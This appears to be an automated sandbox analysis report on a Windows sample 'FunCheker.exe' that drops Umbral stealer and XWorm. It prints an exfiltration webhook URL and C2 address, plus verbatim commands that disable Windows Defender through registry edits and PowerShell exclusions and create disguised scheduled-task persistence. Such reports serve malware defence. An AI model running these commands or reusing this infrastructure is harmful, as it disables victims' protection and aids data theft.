Analysis
-
max time kernel
98s -
max time network
102s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
20-07-2024 17:47
General
-
Target
FunCheker.exe
-
Size
4.9MB
-
MD5
ed4e93a8e3e314093fd29c1eec8a215d
-
SHA1
33b3c5588f9c59668c6d1d307de2219d1dd2001b
-
SHA256
484ac7a733ca8a6eaecfe04a9fabe559a44dad80bdfde4ce6cd735d87eccc7cc
-
SHA512
703948850a956f665c64a6f601a3a0ebc5a366da7af6abea53a7d28bc264a8b7d7115ef54cfb5bb229edc2e2d71806580e0356fe74a9b1fe59516a2ab1cce92d
-
SSDEEP
98304:euphkGhwiL8sEHA5Empd+OvwqyNUOT++UDu93CVZnZgSROb5WbOG:17k7oiQEmpg2NSK+ZYA5W
Malware Config
Extracted
umbral
https://discordapp.com/api/webhooks/1263133479521091615/xsQqcsnMROKJThDjUS6SSW5_NODWCrCjwU7n2qAMIVN8tFELtf3_ISUbQ5EPJJcK86ck
Extracted
xworm
3.0
plus-loves.gl.at.ply.gg:59327
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
-
Detect Xworm Payload 2 IoCs
-
Modifies WinLogon for persistence 2 TTPs 6 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
-
Xworm
Xworm is a remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 4 IoCs
-
Executes dropped EXE 7 IoCs
-
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 14 IoCs
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
-
Drops file in Program Files directory 5 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies registry class 5 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"C:\Users\Admin\AppData\Local\Temp\FunCheker.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Drops startup file
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Maicrasoft OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Maicrasoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Local\Temp\DC1TE4DXG9UMEFE.exe"C:\Users\Admin\AppData\Local\Temp\DC1TE4DXG9UMEFE.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DC1TE4DXG9UMEFE" /tr "C:\Users\Admin\AppData\Roaming\DC1TE4DXG9UMEFE.exe"4⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\EOD3ADWITUZK9VO.exe"C:\Users\Admin\AppData\Local\Temp\EOD3ADWITUZK9VO.exe"3⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "5⤵
-
C:\HypercomponentCommon\hyperSurrogateagentCrt.exe"C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3vm4hsxe\3vm4hsxe.cmdline"7⤵
- Drops file in System32 directory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4A72.tmp" "c:\Windows\System32\CSCA5F24F8A55DD4BDA95D1424A42601FEA.TMP"8⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\sppsvc.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\ShellExperienceHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\lsass.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\uk-UA\Idle.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\fontdrvhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\aTq8Qzn3nq.bat"7⤵
-
C:\Windows\system32\chcp.comchcp 650018⤵
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵
-
-
C:\HypercomponentCommon\lsass.exe"C:\HypercomponentCommon\lsass.exe"8⤵
- Executes dropped EXE
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker .bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 650013⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵
- Modifies registry class
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\HypercomponentCommon\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\HypercomponentCommon\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\HypercomponentCommon\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Media Player\uk-UA\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 5 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 10 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Roaming\DC1TE4DXG9UMEFE.exeC:\Users\Admin\AppData\Roaming\DC1TE4DXG9UMEFE.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
220B
MD547085bdd4e3087465355c9bb9bbc6005
SHA1bf0c5b11c20beca45cc9d4298f2a11a16c793a61
SHA25680577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752
SHA512e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684
-
Filesize
105B
MD55ee2935a1949f69f67601f7375b3e8a3
SHA16a3229f18db384e57435bd3308298da56aa8c404
SHA256c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06
SHA5129777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a
-
Filesize
1.9MB
MD57be5cea1c84ad0b2a6d2e5b6292c8d80
SHA1631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce
SHA2566eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7
SHA512ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647
-
Filesize
3KB
MD5ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD54b44b4372d72053ad71364f24626c92a
SHA1049a3594d27e9237b925bbf944aaf7d718aabd6f
SHA2561b20fbb9e66b4756100851ef7275d5ad54bced08136c5a14508c2b2f1761def5
SHA512b9a8a584de0fb7f1de1075099f4facf4fe6421fba0707fce93b26a31576a43dfef54ae6c9934843031896e5a05836222df356dfdfa76c9804912224de5a7158d
-
Filesize
1KB
MD5453fbb8c24446e8c2866d75fb15cf79d
SHA1a8ed973fc1ae3ab3dab0d7d8720aa4551d6f94db
SHA256a206b98d3a6497468dcbd2015bee85e502cf1cd00622f58e2c0662bd3eab1c02
SHA5127089483a0a72b5fefb4a428a1abcf236d1af16f78a1ed2763005dd69660298c07d2a6486d3c61d15cdaadb04b67aa0c8fc4fcfe249c4127838cc67299161403e
-
Filesize
1KB
MD54e36cd1fa1e00c532cb82880a8a6097d
SHA12d5a84ef221b0d5637fb854f68eef69d36065c15
SHA256f55e8fb411153ce462b5e7cbe4c2e362bb4a73dcaff6e2905aea6eab5a4fb8ca
SHA5124910cec0f2ea8c9b1490fa1d95369d97bf8ff80840454ecea0ed50d9427a421fdb5bc914c86a05f92574211a4c7a3f429acbfd950c6d8411ef6fa31fabd2a2e6
-
Filesize
18KB
MD55d37d22edd81ae75ab444c2f3e2960c6
SHA16daf3c849a07f4c2fdbd79bbc0a2d32a9cca4090
SHA256c1e1869fd229b29dfec23f9785727cf0c0924696c6f7dfc89dc2cfd95305f8bb
SHA5123608f54e76b0bf813a37a20edc0e4aadbeba83ee57900a7d18105678781e1f4f9b194529575f4f8a1a61da35c5dd5ade0cdb8b1073245297387587cfc5e27b54
-
Filesize
18KB
MD5b8b574173558da5eaec0f96fb602eefb
SHA11acef28286e23fce861b86b834d858476c5882ea
SHA256704bf8cf8d160f01641b34617af886c2362f8ea651b63429fa8d13418893892f
SHA512e51a10d16515690d852d0e7f2b7cb1c1f67755ade7d6aa5364f23dcde987b0d763ab159bc6ae5c788edcf00f4caa87a676946e208ec089285c300b6bd91aeb1c
-
Filesize
18KB
MD54c0a17c2a2bbf3f38f99fcc5a062cc90
SHA129a9af5913285cc8d7b71378001d10a20ce4aae9
SHA256a592aad241022cb6e96deeafd1fc080076d71251b8f0a544b33fffb9b22bbcc5
SHA51244f599995f282c618a38cf0b3dfb45ed3d31ea189ccf12ee1ddbc9351b6b967f7a14601afd789326d74a55b288d3cea2009812d75a490e61358e578c1506c881
-
Filesize
185KB
MD5e0c8976957ffdc4fe5555adbe8cb0d0c
SHA1226a764bacfa17b92131993aa85fe63f1dbf347c
SHA256b8260ac46e03f2a7baa9ae01bee5443d16d9eb96f6ee8588a887d6de72a750d4
SHA5123a1ea48e81ebfd5586938a72afd68bcc48d4c5d69949cfdacf33aee3371d98f202443f5db12bac876ca7cecc982ddc56827f8d9b1857d22bda71242d5b2cc71e
-
Filesize
2.2MB
MD505d87a4a162784fd5256f4118aff32af
SHA1484ed03930ed6a60866b6f909b37ef0d852dbefd
SHA2567e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950
SHA5123d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc
-
Filesize
3KB
MD542afdea7c75bc9074a22ff1be2787959
SHA124bc20691a1e99e2cf0b2bca78694701fa47720a
SHA2563d005de7ab5cd8684deeb07dd7e280659384bc574ebe2293b470e29a092ecbc2
SHA512d30c5a89fa98534dc53f0e686db7a4eae66c891a4c06f585fcb35f3dcbad372365f175d2b7fa878875812dd9da097181784a35f8f615e8c05668d64a13863bb9
-
Filesize
1KB
MD58d0360cf503a0d88c27c114acf9477b3
SHA1ed1c703af2b877cfda348eaf13e9039ed925075d
SHA256eade0a7e7ccba4835e9e5a0bdbc96e171cfb2d030792d9d5df3a7c57dd1029a5
SHA512b0e137e1026cfbe6c1560c50847786accc5fe5c9f9f3e34f64faf6684c9f73ecc2e04073ebb5a928e20862045b32f17ab35091975a586a537f67f0604331d2c1
-
Filesize
231KB
MD5f98ea379e5a643b00bc4f7a51acc7a60
SHA1ac3ae365f37f46963f7d8878e80427d0de53194c
SHA25663a3a1e3173b0fdb4d6ef5954dc1b480f8ee9dae7c9c2e1396f0a42be41da7c0
SHA512ba22ddfcb82dd225074f24f4222c78e7329ffbb6447770b2eb0abc16f7fbc16f1f0662b09e4e99b2634f11f2a634026e6fd45881c2d0fd955056fe87d87576a9
-
Filesize
2.2MB
MD574e3ceb1135a7c19cef41a93ffa27877
SHA1dc0f32115d9992d18c4ba1adbd648e05ab913c0d
SHA256e8f8000c08dd2691d19f540fadeddbbb8024220059080a6718bc0296a80a1e79
SHA512e23e354a7b3ca15306b9b663eeba2843545be89237456fa319db751753cddb6080c7a7611d03c02b395016ed39ece7f9fa4905759ca02b29d6457e3e9b991323
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
209B
MD5f9147c74e5818ddcc56ac4bf4d48265f
SHA1feaaa787e9b67d62d14a43942286cef4b6fc0ca1
